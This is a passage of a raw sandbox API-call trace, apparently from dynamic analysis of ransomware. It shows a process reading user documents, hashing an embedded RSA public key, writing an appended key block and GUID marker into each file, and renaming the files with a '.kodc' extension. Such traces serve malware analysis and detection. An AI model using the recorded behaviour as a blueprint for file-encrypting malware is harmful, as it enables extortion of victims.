0x32d0958 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac58 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac40 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d840 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.906] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xb8ab, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xb8ab, lpOverlapped=0x0) returned 1 [0098.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.907] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb8b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.907] CloseHandle (hObject=0x5cc) returned 1 [0098.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.908] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y2SVijXO1-hEI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y2svijxo1-hei.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y2SVijXO1-hEI.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y2svijxo1-hei.pptx.kodc")) returned 1 [0098.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.909] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.910] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa41ccbe0, ftCreationTime.dwHighDateTime=0x1d5bae7, ftLastAccessTime.dwLowDateTime=0x60f7b740, ftLastAccessTime.dwHighDateTime=0x1d5b910, ftLastWriteTime.dwLowDateTime=0x60f7b740, ftLastWriteTime.dwHighDateTime=0x1d5b910, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yac0tbNe-C1 iM.rtf", cAlternateFileName="YAC0TB~1.RTF")) returned 1 [0098.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Yac0tbNe-C1 iM.rtf") returned=".rtf" [0098.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Yac0tbNe-C1 iM.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yac0tbne-c1 im.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.911] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=79322) returned 1 [0098.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.914] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x135b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.914] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.915] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.915] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x135da, lpOverlapped=0x0) returned 1 [0098.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.915] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.916] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.916] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.916] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.916] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.916] GetLastError () returned 0x0 [0098.916] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.917] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.917] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.917] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.917] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x135e0) returned 0x9ba4d90 [0098.917] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d840 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d888 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac40 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.918] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac88 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac70 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.919] GetCurrentThreadId () returned 0x42c [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fbc8 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.919] GetCurrentThreadId () returned 0x42c [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.921] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x135da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.921] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.921] CloseHandle (hObject=0x5cc) returned 1 [0098.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Yac0tbNe-C1 iM.rtf" (normalized: "c:\\users\\5p5nrgjn0js 